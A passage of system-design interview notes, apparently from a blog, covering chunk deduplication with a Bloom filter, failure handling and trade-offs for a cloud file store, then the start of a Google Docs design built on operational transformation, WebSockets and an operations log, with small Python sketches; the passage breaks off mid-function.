Solution: Bloom filter in Redis for chunk hashes. Before hitting PostgreSQL, check the Bloom filter: if the hash is definitely not present, skip the DB lookup entirely. Bloom filters have false positives (they say "exists" when the hash does not) but never false negatives. A false positive causes an unnecessary DB lookup, which is not a correctness problem. At a 1% false positive rate, about 99% of lookups for new hashes are skipped, so DB load falls roughly in proportion to the share of incoming hashes that are new (~70% for a working set that is mostly new content).
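
To make the "no false negatives" property concrete, here is a small self-contained Bloom filter in Python. It is a sketch under stated assumptions: the filter lives in process memory rather than Redis, the class and `chunk_exists` helper are hypothetical, and a plain `set` stands in for the PostgreSQL chunks table.

```python
import hashlib


class BloomFilter:
    def __init__(self, num_bits: int, num_hashes: int) -> None:
        self.num_bits = num_bits
        self.num_hashes = num_hashes
        self.bits = bytearray((num_bits + 7) // 8)

    def _positions(self, item: str):
        # Derive k bit positions from one SHA-256 digest via double hashing.
        digest = hashlib.sha256(item.encode()).digest()
        h1 = int.from_bytes(digest[:8], "big")
        h2 = int.from_bytes(digest[8:16], "big") | 1
        for i in range(self.num_hashes):
            yield (h1 + i * h2) % self.num_bits

    def add(self, item: str) -> None:
        for pos in self._positions(item):
            self.bits[pos // 8] |= 1 << (pos % 8)

    def might_contain(self, item: str) -> bool:
        return all(self.bits[pos // 8] & (1 << (pos % 8))
                   for pos in self._positions(item))


def chunk_exists(chunk_hash: str, bloom: BloomFilter, db_hashes: set) -> bool:
    """Check the filter first; only consult the DB when the filter says 'maybe'."""
    if not bloom.might_contain(chunk_hash):
        return False  # definitely new: no DB lookup needed
    return chunk_hash in db_hashes  # may be a false positive, so confirm
```

Every hash that was added is always reported as possibly present, so an existing chunk is never mistaken for a new one; the only cost of a false positive is one extra lookup.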

[!TIP]
Mention the Bloom filter dedup optimization in interviews — it is a senior-level detail that shows you have thought about the hot path. Say: "I would put a Bloom filter in Redis in front of the chunk hash DB lookup. False positives are acceptable — they just cause an extra DB read. False negatives would break dedup correctness, but Bloom filters never produce false negatives."

12. Failure Scenarios

Failure	Impact	Recovery
DB primary fails	Writes blocked — upload complete, quota update, permission change fail	PostgreSQL replica auto-promoted (RDS Multi-AZ, ~30s failover); upload service retries commit with exponential backoff
S3 availability event	Upload chunks fail mid-flight	Client retries failed chunks individually via new pre-signed URLs; already-uploaded chunks are not re-sent (idempotent by hash)
Message queue outage	S3 upload complete events lost — sync notifications not sent	Polling fallback: upload service polls S3 for pending events on recovery; clients re-sync on reconnect by comparing local version vs server version
Notification service crash	Connected devices stop receiving WebSocket pushes	Clients fall back to polling `/files/changes?since=timestamp` every 30s; WebSocket reconnects on next heartbeat
Redis quota cache failure	Quota checks fall through to PostgreSQL directly	Latency increases for upload initiate; correctness unaffected — PostgreSQL is source of truth; Redis rebuilt on restart
Network partition — client offline	Local changes not uploaded	Client queues pending changes locally; uploads in order on reconnect; conflict detection handles simultaneous edits
Chunk dedup race — two users upload same new chunk simultaneously	Both pass Bloom filter, both write to DB	PostgreSQL unique constraint on `chunk_hash` PK causes one INSERT to fail; second writer treats it as success (chunk already stored) — idempotent
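
The idempotent handling of the chunk dedup race in the last row can be sketched as below. SQLite is used here only as a runnable stand-in for PostgreSQL, and the `chunks` table layout and the `open_db` / `store_chunk` helpers are assumptions for illustration. On PostgreSQL the equivalent statement would be `INSERT ... ON CONFLICT (chunk_hash) DO NOTHING`.

```python
import sqlite3


def open_db() -> sqlite3.Connection:
    """Create an in-memory DB with chunk_hash as the primary key."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE chunks (chunk_hash TEXT PRIMARY KEY, size_bytes INTEGER NOT NULL)"
    )
    return conn


def store_chunk(conn: sqlite3.Connection, chunk_hash: str, size_bytes: int) -> bool:
    """Record a chunk; return True if this call inserted it, False if it already existed."""
    cur = conn.execute(
        "INSERT OR IGNORE INTO chunks (chunk_hash, size_bytes) VALUES (?, ?)",
        (chunk_hash, size_bytes),
    )
    conn.commit()
    # A duplicate key is skipped silently, so the losing writer sees 0 rows changed.
    return cur.rowcount == 1
```

Both writers can treat either return value as success; the flag only tells them who actually created the row.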

13. Trade-offs

Pre-Signed URL vs Proxy Upload

Dimension	Pre-Signed URL — direct to S3	Proxied Upload — via app server
App server load	Zero — no bytes transit servers	14.5 GB/sec through servers at peak
Throughput ceiling	S3 capacity — effectively unlimited	Application server bandwidth
Upload latency	Client to S3 directly — 1 hop	Client to server to S3 — 2 hops
Security	URL expires in 15 min, scoped to one object	Server controls all access
Client complexity	3-step flow — initiate, upload, complete	Simple POST

Chosen: Pre-signed URLs. We never proxy file bytes through application servers. The trade-off we accept is a 3-step client upload flow, which is acceptable because the client SDK abstracts this entirely.

[!NOTE]
Key Insight: Pre-signed URLs are not just an optimization — they are the only architecture that scales. Proxying 25 TB/day of file uploads is not a latency problem; it is a physics problem.

Chunk-Level Dedup vs File-Level Dedup

Dimension	Chunk-level — 5 MB blocks	File-level — whole file hash
Dedup ratio	60–70% — partial content shared	30% — exact duplicates only
Metadata overhead	N chunk records per file	1 record per file
Partial upload resume	Resume from last successful chunk	Must restart entire file
Bandwidth savings	Upload only unique chunks	Upload whole file or nothing
Implementation complexity	Higher — chunk hash lookup per chunk	Lower — single hash check

Chosen: Chunk-level deduplication. Most storage savings come from shared partial content — video edits, document revisions, backup files with unchanged blocks. File-level dedup only catches exact duplicates. The trade-off we accept is higher metadata DB size (~200 TB of chunk records at scale), which is a known, bounded cost.

[!NOTE]
Key Insight: Chunk-level dedup is the reason Dropbox could undercut competitors on price. Two users uploading the same popular video share all 200 chunks — only one copy on disk. Storage cost is amortized across all users.

PostgreSQL vs NoSQL for Metadata

Dimension	PostgreSQL — chosen	Cassandra or DynamoDB
Directory hierarchy queries	Natural — adjacency list, recursive CTE	Requires denormalization or multiple reads
Permission joins	Native — JOIN file_metadata and permissions	Requires denormalization or application-side join
Quota aggregation	SUM query on owner_id — native SQL	Requires counter table or external aggregation
Consistency	Strong — ACID transactions	Eventual by default
Write throughput	~100K writes/sec sharded by owner_id	Multi-million writes/sec
Operational complexity	Moderate	Higher

Chosen: PostgreSQL with sharding by owner_id. Metadata is fundamentally relational — files have parents, permissions have users, users have quotas. Write volume (~580 uploads/sec) is well within sharded PostgreSQL capacity. The trade-off we accept is sharding complexity, which is acceptable because correctness of permission checks and quota enforcement requires ACID guarantees that NoSQL cannot provide cheaply.

[!NOTE]
Key Insight: The metadata for a storage system is fundamentally relational. Parent-child folder relationships, permission joins, and quota aggregation are natural SQL. NoSQL requires denormalization to express the same relationships — you trade write throughput you do not need for query complexity you must now manage yourself.

Interview Summary

Key Decisions

Decision	Problem It Solves	Trade-off Accepted
Pre-signed URLs — not proxied	25 TB/day of file bytes bypasses application servers	3-step client upload flow; client SDK complexity
Chunk-level dedup via SHA-256	60–70% storage savings; partial upload resume	Chunk metadata overhead in PostgreSQL
Metadata DB — not filesystem	O(1) rename and move; clean permission joins; natural quota aggregation	PostgreSQL sharding complexity at scale
Eventual consistency for sync	High availability; devices sync independently; simple architecture	1–2 second lag before new file appears on other devices
Message queue for S3 to sync	Reliable handoff from upload complete to notification — survives service restarts	200–500ms additional sync latency
CDN for downloads	Sub-50ms download globally for popular shared files	CDN egress cost

Fast Path vs Reliable Path

Fast Path   (throughput):  Client chunks file locally
                           -> Client uploads chunks directly to S3 via pre-signed URL
                           -> S3 emits event to Message Queue

Reliable Path (durability): Metadata DB write before upload confirmed
                            -> Quota enforced atomically on /files/complete
                            -> Notification fan-out only after metadata committed

File bytes  = fast path only  (S3-native, CDN-accelerated on download)
File record = reliable path   (PostgreSQL, ACID, quota-enforced)
Sync signal = reliable path   (MQ -> Notification Service -> WebSocket)

Key Insights Checklist

[!IMPORTANT]
These are the lines that make an interviewer lean forward. Know them cold.

"A folder in Google Drive is not a directory — it is a metadata row." Moving a file is changing a parent_id field. Rename is changing a name field. No bytes move. O(1) regardless of folder size.
"File bytes never touch the application server." Pre-signed URLs send data client to S3 directly. The backend handles only metadata and issues tokens. This is the only architecture that scales to 25 TB/day.
"Deduplication works at the chunk level." Two uploads sharing the same video clip share storage. The second upload is a metadata pointer — no bytes transferred. This is why Dropbox could undercut storage costs.
"Chunking is not just for large files — it enables deduplication, parallel upload, and partial retry." A 1 GB file in 5 MB chunks uploads 200 chunks in parallel and resumes from any failed chunk.
"Sync is pull-on-notification, not push." The notification says 'something changed.' The device decides what to download. This avoids pushing large files to mobile devices on limited storage.
"Metadata is relational — use a relational DB." Parent-child folders, permission joins, quota aggregation are natural SQL. NoSQL requires denormalization to express the same relationships and you trade write throughput you do not need for query complexity you must now manage.

Google Docs (Real-time Collaborative Editor) V2

Arghya Majumder — Fri, 27 Mar 2026 23:29:26 +0000

System Design: Google Docs (Real-time Collaborative Editor)

🧠 Mental Model

Google Docs is not syncing text. It is syncing operations across distributed clients.

This is the insight that unlocks the entire design. When Alice types "R" at position 29, Google Docs does not send the document. It sends { type: "insert", pos: 29, char: "R", version: 42, client_id: "alice" }. The document is a materialized view of a sequence of operations — not the source of truth. The operations log is.

Two users editing the same position at the same millisecond will produce divergent documents unless a conflict resolution algorithm (OT or CRDT) transforms one operation against the other before applying. The entire architecture is organized around making that transformation correct, fast, and durable. Everything else — WebSocket, Cassandra, Redis, S3 — serves those three requirements.
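
The "document as a materialized view of the operations log" idea can be shown with a short replay function. This is a minimal sketch: the op shape follows the example above, while `apply_op` and `materialize` are hypothetical helper names and the log is a plain Python list.

```python
def apply_op(doc: str, op: dict) -> str:
    """Apply a single insert or delete to a document string."""
    if op["type"] == "insert":
        return doc[:op["pos"]] + op["char"] + doc[op["pos"]:]
    if op["type"] == "delete":
        return doc[:op["pos"]] + doc[op["pos"] + 1:]
    raise ValueError(f"unknown op type: {op['type']}")


def materialize(log: list, snapshot: str = "") -> str:
    """Rebuild the document by replaying committed ops on top of a snapshot."""
    doc = snapshot
    for op in log:
        doc = apply_op(doc, op)
    return doc
```

Replaying the full log from an empty document and replaying only the tail of the log on top of a snapshot give the same result, which is what makes snapshots a safe shortcut.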

The system runs two paths concurrently:

Fast path: apply locally → send to OT Server → transform → broadcast to peers (optimizes latency)
Reliable path: append to Operations Log before ACK (optimizes durability)

                    ┌──────────────────────────────────────────────────────────┐
                    │                      FAST PATH                            │
  ┌────────┐  op    │  ┌──────────┐  transform  ┌──────────┐  broadcast       │
  │ UserA  │ ──────►│  │OT Server │ ───────────►│OT Server │ ──────► peers    │
  └────────┘        │  └──────┬───┘             └──────────┘                  │
   (optimistic      │         │ concurrent ops                                 │
    local apply)    └─────────┼───────────────────────────────────────────────┘
                              │ append (before broadcast, before client ACK)
                    ┌─────────▼───────────────────────────────────────────────┐
                    │                   RELIABLE PATH                           │
                    │              ┌─────────────────┐                         │
                    │              │ Operations Log   │  <- every op stored    │
                    │              │   (Cassandra)    │     before ACK sent    │
                    │              └─────────────────┘                         │
                    └─────────────────────────────────────────────────────────┘

⚡ Core Design Principle

Principle	Decision	Why
Conflict resolution	Operational Transformation (OT)	Central server already required; OT maps naturally
Operation granularity	Delta (insert/delete + position)	Full file replacement causes last-writer-wins data loss
Transport	WebSocket (persistent, bidirectional)	HTTP request-response cannot push server-initiated ops
Durability	Append-only Operations Log in Cassandra	Event sourcing — replay any version from any point
Latency	Optimistic local apply before server ACK	Visual responsiveness over consistency for text editing
Ephemeral state	Redis with TTL for cursors and presence	Cursor data expires naturally; storing in DB adds write amplification

1. Problem Statement & Scope

Google Docs allows multiple users to edit the same document simultaneously in real time. Changes made by one user appear in every other user's browser within milliseconds. The system must handle billions of documents, millions of concurrent editors, and guarantee zero data loss.

In scope:

Create, read, update, delete documents
Single-user and multi-user real-time collaborative editing
Cursor positions and presence for all active collaborators
Document versioning — save snapshots, restore to any version
Offline editing with automatic sync on reconnect

Out of scope:

Comments and suggestions (separate service)
Permissions and sharing UI (separate IAM service)
Spreadsheets and Slides (different data models)

2. Requirements

Functional Requirements

CRUD Documents — create, open, rename, and delete documents
Real-time collaborative editing — all collaborators see changes within 100ms
Cursor and presence — see where each collaborator's cursor is and who is online
Document versioning — view history, restore to any prior version
Offline editing — buffer local operations while offline, sync on reconnect

Non-Functional Requirements

Requirement	Target
Concurrent active editors	1 million
Total documents	1 billion
Edit propagation latency	< 100ms end-to-end
Data durability	Zero data loss (operations log is source of truth)
Availability	99.99% for solo editing; strong consistency for collaborative editing
Throughput	5 million operations/sec at peak

CAP Discussion

[!NOTE]
Key Insight: Google Docs makes a deliberate CAP choice that varies by editing mode. Solo editing: AP (availability over consistency — your edits always go through even if a replica is stale). Collaborative editing: CP (consistency over availability — all collaborators must converge to the same document state; the OT server is the single ordering point).

For collaborative editing, the OT server acts as the serialization point. If it is unreachable, clients buffer locally and display a "reconnecting" state rather than allowing divergent edits that cannot be reconciled.

3. Back-of-the-Envelope Estimations

Parameter	Value	Reasoning
Total documents	1 billion	Given
Concurrent active editors	1 million	0.1% of documents active at any time
Operations per editor per second	5	1 keystroke per 200ms
Peak operations/sec	5 million	1M x 5
Operation payload size	~200 bytes	Delta: type + position + char + version + client_id
Operations write throughput	~1 GB/sec	5M x 200B
Snapshot frequency	Every 100 ops	Background compaction
Average document snapshot size	~50 KB	Typical rich-text document
Snapshot storage per day	~50 GB	1M active docs x 1 snapshot/day x 50KB
WebSocket connections	1 million	One persistent connection per active editor
Redis cursor entries	1 million keys	One HSET per active document, TTL = 30s

Cassandra sizing for operations log:

1 GB/sec write throughput -> 86 TB/day at peak (real average ~10x lower -> ~10 TB/day)
Retain raw operations for 30 days -> ~300 TB hot storage
Older operations compacted into snapshots -> S3 for cold storage

WebSocket gateway sizing:

Each WebSocket connection consumes ~64 KB memory at the server
1 million connections -> ~64 GB RAM across gateway fleet
Horizontal scaling: shard by doc_id
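
The sizing arithmetic above can be re-derived with a few lines of Python. The inputs are the figures from the estimation table; the function name `estimate` and the use of decimal units (1 TB = 10^12 bytes) are assumptions of this sketch. The text rounds 8.64 TB/day to ~10 TB/day and 259 TB to ~300 TB.

```python
def estimate() -> dict:
    editors = 1_000_000            # concurrent active editors
    ops_per_editor_per_sec = 5     # one keystroke per 200 ms
    op_bytes = 200                 # delta payload size
    conn_bytes = 64_000            # ~64 KB of server memory per WebSocket

    peak_ops = editors * ops_per_editor_per_sec       # ops/sec
    peak_bytes_per_sec = peak_ops * op_bytes          # bytes/sec
    peak_tb_per_day = peak_bytes_per_sec * 86_400 / 1e12
    avg_tb_per_day = peak_tb_per_day / 10             # average ~10x below peak
    return {
        "peak_ops_per_sec": peak_ops,
        "peak_gb_per_sec": peak_bytes_per_sec / 1e9,
        "peak_tb_per_day": peak_tb_per_day,
        "avg_tb_per_day": avg_tb_per_day,
        "hot_storage_tb_30d": avg_tb_per_day * 30,
        "gateway_ram_gb": editors * conn_bytes / 1e9,
    }
```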

4. API Design

REST API (Document Lifecycle)

POST   /api/v1/documents
       Body:     { title, owner_id }
       Response: { doc_id, created_at, blob_url }
       Purpose:  Create a new empty document

GET    /api/v1/documents/{doc_id}
       Response: { metadata, content_url, current_version }
       Purpose:  Fetch document metadata and URL of latest snapshot (served via CDN)

DELETE /api/v1/documents/{doc_id}
       Purpose:  Soft-delete; moves to trash, not immediately purged

GET    /api/v1/documents/{doc_id}/versions
       Response: [{ version_id, created_at, snapshot_url, op_count }]
       Purpose:  List all named versions and auto-snapshots

POST   /api/v1/documents/{doc_id}/versions
       Body:     { label }
       Purpose:  Create a manual named snapshot at current state

WebSocket API (Real-time Editing Session)

WS     /ws/documents/{doc_id}/edit
       Auth: Bearer token (validated on handshake upgrade)
       Sticky routing: client must reconnect to same OT Server node for the document

Client -> Server (operation):
  {
    type:      "operation",
    op: {
      type:      "insert" | "delete",
      pos:       29,
      char:      "R",
      version:   142,
      client_id: "uuid"
    }
  }

Client -> Server (cursor):
  {
    type:      "cursor",
    pos:       29,
    selection: { start: 29, end: 35 }
  }

Server -> Client (transformed operation broadcast):
  {
    type:              "operation",
    op:                { ...original_op },
    transformed_op:    { type: "insert", pos: 30, char: "R" },
    committed_version: 143
  }

Server -> Client (remote cursor):
  {
    type:    "cursor",
    user_id: "alice",
    pos:     15,
    color:   "#FF6B6B"
  }

Server -> Client (presence):
  {
    type:    "presence",
    user_id: "bob",
    status:  "online" | "idle" | "offline"
  }

[!NOTE]
Key Insight: The version field in the operation is the client's local version when the op was generated, not the server's committed version. The OT server uses this gap (client version vs. server version) to determine which concurrent operations the incoming op must be transformed against.

5. System Architecture

High-Level Architecture

Evolved Architecture: WebSocket Sticky Routing

[!NOTE]
Key Insight: OT requires all operations for a document to pass through a single server — this is a correctness requirement, not a scaling limitation. Without a single ordering point, two OT servers could transform the same pair of concurrent operations in different orders, producing divergent documents. The session map in Redis routes every client for a given doc_id to the same OT Server node.

6. Operation Data Flow

[!IMPORTANT]
This is the flow interviewers want to hear you walk through. Every step has a purpose — know WHY each step exists.

🔄 The One-Line Flow (Say This First)

Client → apply locally → send op → Server → transform against concurrent ops
       → append to log → broadcast transformed op → other clients apply

This is the entire system in one line. Everything else — WebSocket, Cassandra, Redis, OT engine — exists to make each arrow in this flow correct, fast, and durable.

Arrow	Mechanism	Failure mode if skipped
`apply locally`	Optimistic apply before server ACK	Editing feels laggy — 200ms+ perceived latency
`send op`	WebSocket frame with `{type, pos, char, client_version}`	Server cannot transform without the version gap
`transform`	OT function adjusts positions against concurrent ops	Documents diverge — different clients see different text
`append to log`	Cassandra write BEFORE broadcast	Op lost on server crash — cannot replay on reconnect
`broadcast`	Push to all connected clients on same doc_id	Peers never see the change
`other clients apply`	Client-side OT against own pending ops	Client and server state desync — rollback spiral

🔄 Complete Operation Lifecycle

Step 1: Local Apply (client)
Step 2: Send to server (WebSocket)
Step 3: Transform on server (OT Engine)
Step 4: Append to Operations Log (Cassandra)
Step 5: Broadcast transformed op to all peers (WebSocket)
Step 6: Peers apply transformed op to their local doc

Step-by-Step WHY

Step	What happens	Why it must happen this way
1. Local apply	Client applies op to local doc without waiting	Makes editing feel instant — zero perceived latency
2. Send to OT Server	Op sent with `client_version` (doc version when op was generated)	Server needs the version gap to know which concurrent ops to transform against
3. Fetch concurrent ops	Server retrieves all ops committed since `client_version`	These are the ops the client did NOT know about when it generated its op
4. Transform	OT function adjusts positions against each concurrent op	Without this, positions become wrong → documents diverge
5. Append to log	Store BEFORE broadcasting	If server crashes after write but before broadcast, the op is in the log — clients fetch on reconnect
6. ACK to sender	Confirm the op's committed version	Client replaces pending op with committed version — can now generate next op correctly
7. Broadcast to peers	Push transformed op to all connected clients	Peers apply the server-transformed version, not the raw client version

[!NOTE]
Key Insight: The client_version is the crucial field. It tells the server "when I generated this op, I had seen operations up to version N." The server's job is to transform the op against everything that happened between version N and now. This is the entire OT algorithm in one sentence.
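
As a rough sketch of how the server uses `client_version`, the class below slices the committed log at that version, transforms the incoming op against everything after it, and appends before returning the ACK payload. It is illustrative only: `DocumentSession` and `transform_insert` are hypothetical names, the log is an in-memory list instead of Cassandra, and only insert operations are handled.

```python
def transform_insert(op: dict, committed: dict) -> dict:
    """Shift an insert right by one if a committed insert landed at or before it."""
    if committed["pos"] <= op["pos"]:
        return {**op, "pos": op["pos"] + 1}
    return op


class DocumentSession:
    """Hypothetical per-document ordering point (inserts only)."""

    def __init__(self) -> None:
        self.log = []  # log[i] is the op that produced server version i + 1

    def submit(self, op: dict) -> dict:
        # Ops committed after the version the client had seen.
        concurrent = self.log[op["client_version"]:]
        transformed = op
        for committed in concurrent:
            transformed = transform_insert(transformed, committed)
        # Append before ACK or broadcast so a crash cannot lose the op.
        self.log.append(transformed)
        return {"transformed_op": transformed, "committed_version": len(self.log)}
```

An op generated at the current version has an empty `concurrent` slice and is committed unchanged.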

6b. Separation of Concerns

The system has three distinct layers. Keeping them separate is what makes the design scalable and debuggable.

Layer	Component	Responsibility	Why separated
Client	Editor	Local document model, keystrokes, rendering	Must be fast — no server round-trip
Client	Client OT Engine	Transform incoming remote ops against pending local ops	Client has unACKed ops the server hasn't seen yet
Sync	WebSocket Gateway	Auth, sticky routing, connection lifecycle	Stateless routing layer — separate from OT logic
Sync	OT Server	Canonical transformation and ordering point	Stateful per-document — must not be distributed
Storage	Operations Log	Durable, replayable event source	Decoupled from serving layer — allows versioning/audit
Storage	Snapshots	Fast initial load	Log replay from op 1 is too slow for large documents
Storage	Redis	Ephemeral state (cursors, presence, session map)	High-frequency writes with natural expiry — wrong fit for DB

[!NOTE]
Key Insight: The Client OT Engine and the Server OT Engine are both necessary. The server transforms incoming ops against other clients' concurrent ops. The client transforms incoming remote ops against its own locally-pending (unACKed) ops. Neither can be skipped. Remove the client engine and cursor positions break whenever you have network lag.

6c. Consistency Model

Eventual Consistency + Strong Convergence

Google Docs is an eventually consistent system with a strong convergence guarantee.

Property	Definition	Google Docs guarantee
Eventual consistency	All replicas will agree on the same state... eventually	Yes — given no new ops, all clients converge
Strong convergence	If two replicas have applied the same set of ops (in any order), they are in the same state	Yes — OT's transformation property ensures this
Linearizability	Every op appears to execute atomically at a single point in time	No — not required for a text editor
Causal consistency	If op A happened before op B (as seen by the client), all clients see A before B	Yes — client version numbers enforce causal ordering

Eventual consistency in practice:
  Alice:  "Hello"  →  "Hello World"  →  "Hello World!"
  Bob:    "Hello"  →  "Hello !"      →  "Hello World!"
                                               ↑
                              Both converge here after transformation

Strong convergence is what OT (and CRDT) provide. It means:

Two clients applying the same set of operations will always reach the same final document state
The ORDER in which concurrent ops are applied does not matter — transformation corrects positions
This holds even with network delays, reordering, or reconnection

[!NOTE]
Key Insight: Google Docs does NOT guarantee that Alice and Bob see the same document at the same millisecond — that would require linearizability, which is prohibitively expensive at this scale. It guarantees that they converge to the same document. The gap is usually < 100ms and invisible to users.

6d. Edge Cases

Out-of-Order Operations

Problem: Network reordering means op at version 44 arrives before op at version 43.

Solution: The OT server enforces ordering at the log level. Every op gets a monotonically increasing server version on commit. Clients buffer ops received out of order and apply them in version order.

Client receives: [ver=44 op], [ver=43 op]
                      ↓
Buffer: { 43: pending, 44: pending }
Wait for ver 43 → apply 43 → apply 44
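
The buffering shown above might look like this on the client. It is a minimal sketch; `OrderedApplier` is a hypothetical name, and ops are opaque values that the caller applies in the order returned.

```python
class OrderedApplier:
    """Buffers ops that arrive early and releases them in server-version order."""

    def __init__(self, last_applied: int) -> None:
        self.last_applied = last_applied
        self.pending = {}  # server version -> op

    def receive(self, version: int, op) -> list:
        """Return the ops that are now safe to apply, in version order."""
        if version <= self.last_applied:
            return []  # already applied, ignore
        self.pending[version] = op
        ready = []
        while self.last_applied + 1 in self.pending:
            self.last_applied += 1
            ready.append(self.pending.pop(self.last_applied))
        return ready
```

Receiving version 44 before 43 returns nothing; once 43 arrives, both are released together.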

[!NOTE]
Key Insight: The server version number is the total ordering mechanism. It converts the partial order (concurrent client ops) into a total order (globally committed sequence). Without it, clients would need vector clocks to detect ordering, which is far more complex.

Duplicate Operations (At-Least-Once Delivery)

Problem: Client sends op, server commits and appends to log, but crashes before sending ACK. Client retries — duplicate op arrives.

Solution: Each op carries (client_id, client_seq). OT Server checks Redis before processing:

GET dedup:{client_id}:{client_seq}
  → exists:  duplicate — return previously committed server_version, drop op
  → missing: process normally, SET dedup:{client_id}:{client_seq} {server_ver} EX 3600
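
The same check can be sketched in Python. To keep the example runnable without a Redis server, a small in-memory class stands in for Redis `GET` and `SET ... EX`; `DedupCache` and `process_once` are hypothetical names, and `commit` is whatever callable appends the op and returns its server version.

```python
import time


class DedupCache:
    """In-memory stand-in for Redis GET and SET with an expiry in seconds."""

    def __init__(self, clock=time.monotonic) -> None:
        self._data = {}
        self._clock = clock

    def get(self, key: str):
        entry = self._data.get(key)
        if entry is None:
            return None
        value, expires_at = entry
        if self._clock() >= expires_at:
            del self._data[key]  # expired, behave as if missing
            return None
        return value

    def set(self, key: str, value, ex: int) -> None:
        self._data[key] = (value, self._clock() + ex)


def process_once(cache: DedupCache, client_id: str, client_seq: int, commit):
    """Return (server_version, was_duplicate); commit() runs at most once per key."""
    key = f"dedup:{client_id}:{client_seq}"
    previous = cache.get(key)
    if previous is not None:
        return previous, True   # retry of an op that was already committed
    server_version = commit()
    cache.set(key, server_version, ex=3600)
    return server_version, False
```

A retried op gets the originally committed version back, so the client can treat the retry's response exactly like the lost ACK.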

Network Delay and Reconnection

Problem: Client loses connection for 30 seconds. Misses 150 ops from other users. On reconnect, their local document is stale.

Solution: Operation log catch-up

[!NOTE]
Key Insight: The Operations Log is not just for versioning — it is the reconnection mechanism. Every client disconnect/reconnect is handled identically: fetch ops since last_known_version from Cassandra, transform against local pending ops, apply. This also handles the offline editing case (F2 in the Frontend section).

7. Deep Dives

6.1 The Three Approaches to Collaborative Editing

This is the most important section of the design. Three approaches exist, and two of them fail at scale or correctness.

Approach 1: File Replacement (Brute Force)

Idea: On every keystroke, serialize the entire document, send it to the server, server overwrites storage, broadcasts new document to all clients.

Problems:

(a) Payload is enormous. A 100 KB document sends 100 KB per keystroke. At 5 ops/sec per user x 1M users = 500 GB/sec of document content transfer. Catastrophic.

(b) Concurrent writes cause silent data loss. Alice and Bob both read version N, both write version N+1 with their own changes. Bob's write overwrites Alice's. Last writer wins — Alice's work silently disappears.

(c) DOM re-render cost. The client must diff the entire document on every update to determine what changed for DOM patching.

Verdict: Rejected.

Approach 2: Locking Protocol

Idea: Prevent concurrent edits by serializing access.

Pessimistic locking: A user acquires an exclusive lock on the document before editing. Others see a read-only view until the lock is released.

Problem: Completely incompatible with real-time collaboration. If Alice locks a document for 2 minutes of typing, Bob is frozen.

Optimistic locking: Users edit freely, but on commit the server checks if the base version is still current. If another write happened, the commit is rejected and the user must manually merge.

Problem: Acceptable for code (Git), but unacceptable for a text editor. Users cannot be asked to resolve merge conflicts for every paragraph.

Verdict: Rejected for real-time collaborative editing.

Approach 3: Delta-Based with Conflict Resolution (OT or CRDT)

Idea:

Send only the operation delta: { type: "insert", pos: 29, char: "R" } — not the whole file.
Use a persistent WebSocket for low-latency bidirectional messaging.
Use a conflict resolution algorithm (OT or CRDT) to reconcile concurrent operations before applying them.

The Alice/Bob Problem — Why Naive Delta Merge Fails:

Initial document: "BC"

Alice: insert "A" at position 0  ->  her local state: "ABC"
Bob:   insert "D" at position 2  ->  his local state:  "BCD"

Naive server merge (apply both without transformation):
  Server applies Alice's op first: "ABC"
  Server applies Bob's op (D at pos 2): "ABDC"   <- Alice sees "ABDC"
  Bob applied D locally ("BC" -> "BCD"), then receives Alice's op (A at pos 0)  -> Bob sees "ABCD"

Alice sees "ABDC", Bob sees "ABCD" -- DIVERGED. Documents are inconsistent.

With OT (Operational Transformation):

Bob's op insert("D", pos=2) was generated against version "BC" (before Alice's insert)
The server knows Alice's op happened first (committed at version 1)
The OT server transforms Bob's op: Alice inserted at pos 0, which shifts all positions right by 1 — Bob's pos 2 becomes pos 3
Transformed op: insert("D", pos=3)
Both Alice and Bob converge to: "ABCD" ✓
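
The divergence and its fix can be reproduced in a few lines. This sketch hard-codes the Alice/Bob example; `insert`, `shift_for`, `naive_merge`, and `ot_merge` are hypothetical helper names, and the transformation covers inserts only.

```python
def insert(doc: str, pos: int, char: str) -> str:
    return doc[:pos] + char + doc[pos:]


def shift_for(pos: int, earlier_pos: int) -> int:
    """Transform an insert position against a concurrent insert ordered before it."""
    return pos + 1 if earlier_pos <= pos else pos


def naive_merge(base: str):
    """Each side applies its own op, then the other's raw op. Returns (alice, bob)."""
    alice = insert(insert(base, 0, "A"), 2, "D")
    bob = insert(insert(base, 2, "D"), 0, "A")
    return alice, bob


def ot_merge(base: str):
    """The server orders Alice first, so Bob's op is transformed against hers."""
    bob_pos = shift_for(2, earlier_pos=0)  # position 2 becomes 3
    alice = insert(insert(base, 0, "A"), bob_pos, "D")
    # Alice's insert at 0 sits before Bob's pending insert at 2, so it applies unchanged.
    bob = insert(insert(base, 2, "D"), 0, "A")
    return alice, bob
```

`naive_merge("BC")` yields two different strings, while `ot_merge("BC")` yields the same string on both sides.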

Verdict: CHOSEN. Delta-based operations with OT conflict resolution.

6.2 OT vs CRDT — The Core Algorithm Choice

Both OT and CRDT solve the concurrent edit problem. They take fundamentally different approaches. Understanding both deeply — including CRDT's real production costs — is what separates a junior answer ("use CRDT, it's simpler") from a senior answer.

OT (Operational Transformation)

The server maintains a canonical operation history for the document
When a client op arrives, the server checks: which ops were committed since the client's last known version?
The transformation function adjusts the incoming op's position against each concurrent op
All operations for a document must pass through a single server (the ordering point)

Transformation rules (simplified):

Concurrent ops	Rule
Insert(A) vs Insert(B), A <= B	B becomes B + 1
Insert(A) vs Insert(B), A > B	B stays B
Insert(A) vs Delete(B), A <= B	B becomes B + 1
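Delete(A) vs Insert(B), A < B	B becomes B - 1
Delete(A) vs Delete(B), A < B	B becomes B - 1
Delete(A) vs Delete(B), A = B	B becomes a no-op (the character is already deleted)
Delete(A) vs Delete(B), A > B	B stays B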
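The rules above can be sketched as a small transform function. This is a minimal illustration, assuming single-character operations; the `Op` type and the `transform` and `apply_op` names are hypothetical, and two deletes at the same position are treated here as a no-op for the later one.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Op:
    kind: str       # "insert" or "delete"
    pos: int
    char: str = ""  # only meaningful for inserts


def transform(incoming: Op, committed: Op) -> Optional[Op]:
    """Rewrite `incoming` so it can be applied after `committed`.

    Both ops were generated against the same document version.
    Returns None when `incoming` turns into a no-op.
    """
    a, b = committed.pos, incoming.pos
    if committed.kind == "insert":
        # An insert at or before the incoming position shifts it right.
        return Op(incoming.kind, b + 1, incoming.char) if a <= b else incoming
    # From here on, `committed` is a delete.
    if incoming.kind == "delete" and a == b:
        return None  # both sides deleted the same character
    # A delete before the incoming position shifts it left.
    return Op(incoming.kind, b - 1, incoming.char) if a < b else incoming


def apply_op(text: str, op: Optional[Op]) -> str:
    if op is None:
        return text
    if op.kind == "insert":
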